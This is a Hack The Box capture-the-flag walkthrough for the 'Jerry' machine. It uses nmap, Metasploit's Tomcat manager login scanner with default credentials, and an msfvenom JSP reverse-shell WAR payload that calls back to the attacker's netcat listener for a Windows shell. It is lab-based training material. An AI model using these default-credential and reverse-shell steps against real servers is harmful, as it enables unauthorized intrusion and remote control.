___ ___ _________ ________
|\ \|\ \|\___ ___\\ __ \ ___
\ \ \\\ \|___ \ \_\ \ \|\ /_|\__\
\ \ __ \ \ \ \ \ \ __ \|__| _ _
\ \ \ \ \ \ \ \ \ \ \|\ \ ___ (o)(o)--.
\ \__\ \__\ \ \__\ \ \_______\|\__\ \xx/ ( )
\|__|\|__| \|__| \|_______|\|__| m\/m--m'`--.
___ _______ ________ ________ ___ ___
|\ \|\ ___ \ |\ __ \|\ __ \ |\ \ / /|
\ \ \ \ __/|\ \ \|\ \ \ \|\ \ \ \ \/ / /
__ \ \ \ \ \_|/_\ \ _ _\ \ _ _\ \ \ / /
|\ \\_\ \ \ \_|\ \ \ \\ \\ \ \\ \| \/ / /
\ \________\ \_______\ \__\\ _\\ \__\\ _\ __/ / /
\|________|\|_______|\|__|\|__|\|__|\|__|\___/ /
\|___|/
Hack The Box's Jerry is an Easy Windows machine that features an Apache Tomcat web server which can easily be exploited with default login credentials and a reverse shell payload generated using MSFvenom.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.10.10.95You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.
Start
by doing a quick service scan using Nmap. We will use the -sV
switch to
enable version detection. You can learn more about Nmap here.
nmap -sV 10.10.10.95 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 12:51 CDT Nmap scan report for 10.10.10.95 Host is up (0.0088s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds
We can see an Apache Tomcat web server running on port 8080. Let's navigate to the site by entering the target's ip address followed by port 8080 into the address bar of your web browser. Upon visual inspection of the page, we can see that we can gain access to the servers manager app through /manager/html. Unfortunately, we are faced with the login prompt.
Let's run the login through a wordlist of default credentials for Tomcat using Metasploit. Open Metasploit in a new terminal by typing "msfconsole".
msfconsole Metasploit tip: Use help <command> to learn more about any command # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v6.3.44-dev ] + -- --=[ 2376 exploits - 1232 auxiliary - 416 post ] + -- --=[ 1391 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit Documentation: https://docs.metasploit.com/ [msf](Jobs:0 Agents:0) >>
Let's search for Tomcat exploits using the "search" option.
search tomcat Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal No Apache Commons FileUpload and Apache Tomcat DoS 1 exploit/multi/http/struts_dev_mode 2012-01-06 excellent Yes Apache Struts 2 Developer Mode OGNL Execution 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection 3 exploit/multi/http/struts_code_exec_classloader 2014-03-06 manual No Apache Struts ClassLoader Manipulation Remote Code Execution 4 auxiliary/admin/http/tomcat_ghostcat 2020-02-20 normal Yes Apache Tomcat AJP File Read 5 exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10 excellent Yes Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability 6 exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Yes Apache Tomcat Manager Application Deployer Authenticated Code Execution 7 exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Yes Apache Tomcat Manager Authenticated Upload Code Execution 8 auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal No Apache Tomcat Transfer-Encoding Information Disclosure and DoS 9 auxiliary/scanner/http/tomcat_enum normal No Apache Tomcat User Enumeration 10 exploit/linux/local/tomcat_rhel_based_temp_priv_esc 2016-10-10 manual Yes Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation 11 exploit/linux/local/tomcat_ubuntu_log_init_priv_esc 2016-09-30 manual Yes Apache Tomcat on Ubuntu Log Init Privilege Escalation 12 exploit/multi/http/atlassian_confluence_webwork_ognl_injection 2021-08-25 excellent Yes Atlassian Confluence WebWork OGNL Injection 13 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE 14 exploit/multi/http/cisco_dcnm_upload_2019 2019-06-26 excellent Yes Cisco Data Center Network Manager Unauthenticated Remote Code Execution 15 exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec 2021-05-05 excellent Yes Cisco HyperFlex HX Data Platform Command Execution 16 exploit/linux/http/cisco_hyperflex_file_upload_rce 2021-05-05 excellent Yes Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499) 17 exploit/linux/http/cpi_tararchive_upload 2019-05-15 excellent Yes Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability 18 exploit/linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution 19 post/multi/gather/tomcat_gather normal No Gather Tomcat Credentials 20 auxiliary/dos/http/hashcollision_dos 2011-12-28 normal No Hashtable Collisions 21 auxiliary/admin/http/ibm_drm_download 2020-04-21 normal Yes IBM Data Risk Manager Arbitrary File Download 22 exploit/linux/http/lucee_admin_imgprocess_file_write 2021-01-15 excellent Yes Lucee Administrator imgProcess.cfm Arbitrary File Write 23 exploit/linux/http/mobileiron_core_log4shell 2021-12-12 excellent Yes MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell) 24 exploit/multi/http/zenworks_configuration_management_upload 2015-04-07 excellent Yes Novell ZENworks Configuration Management Arbitrary File Upload 25 exploit/multi/http/spring_framework_rce_spring4shell 2022-03-31 manual Yes Spring Framework Class property RCE (Spring4Shell) 26 auxiliary/admin/http/tomcat_administration normal No Tomcat Administration Tool Default Access 27 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility 28 exploit/multi/http/tomcat_jsp_upload_bypass 2017-10-03 excellent Yes Tomcat RCE via JSP Upload Bypass 29 auxiliary/admin/http/tomcat_utf8_traversal 2009-01-09 normal No Tomcat UTF-8 Directory Traversal Vulnerability 30 auxiliary/admin/http/trendmicro_dlp_traversal 2009-01-09 normal No TrendMicro Data Loss Prevention 5.5 Directory Traversal 31 post/windows/gather/enum_tomcat normal No Windows Gather Apache Tomcat Enumeration Interact with a module by name or index. For example info 31, use 31 or use post/windows/gather/enum_tomcat [msf](Jobs:0 Agents:0) >>
We see an auxiliary/scanner/http/tomcat_mgr_login exploit. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.
Once the exploit has loaded, type "options" and hit Enter. This will bring up the options which we will need to configure.
use 27 [msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> options Module options (auxiliary/scanner/http/tomcat_mgr_login): Name Current Setting Required Description ---- --------------- -------- ----------- ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, u ser, user&realm) PASSWORD no The HTTP password to specify for authentication PASS_FILE /usr/share/metasploit-framework/data/word no File containing passwords, one per line lists/tomcat_mgr_default_pass.txt Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b asics/using-metasploit.html RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host TARGETURI /manager/html yes URI for Manager login. Default is /manager/html THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no The HTTP username to specify for authentication USERPASS_FILE /usr/share/metasploit-framework/data/word no File containing users and passwords separated by space, one pair per line lists/tomcat_mgr_default_userpass.txt USER_AS_PASS false no Try the username as the password for all users USER_FILE /usr/share/metasploit-framework/data/word no File containing users, one per line lists/tomcat_mgr_default_users.txt VERBOSE true yes Whether to print output for all attempts VHOST no HTTP server virtual host View the full module info with the info, or info -d command. [msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>
Our RPORT is preconfigured to the correct port but our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.
set RHOSTS 10.10.10.95 RHOSTS => 10.10.10.95 [msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>
With everything all set, it's time to run the exploit! Type "run" then hit Enter. Once the exploit is finished running, we can see a successful login using the credentials "tomcat:s3cret"! We can now navigate back to the web server in our browser and access the manager dashboard.
On the dashboard we see an option to upload a WAR file. A WAR file is a file used to distribute JAR-files, Java classes, XML files, tag libraries, static web pages and other resources that together creates a web application. We can instead use this to upload a malicious payload!
Let's generate a reverse tcp payload using MSFvenom:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f war > jerry_warcia.war Payload size: 1102 bytes Final size of war file: 1102 bytes
We can now upload this .war file using the Tomcat dashboard and deploy the file to our server. Once it has been uploaded, open a Netcat listening session in your terminal. You will then need to click the name of the uploaded payload back on the Tomcat dashboard to establish the connection. Netcat should now have a shell:
nc -nvlp 4444 listening on [any] 4444 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>
You can now navigate through the target system to obtain the root and user .txt flags.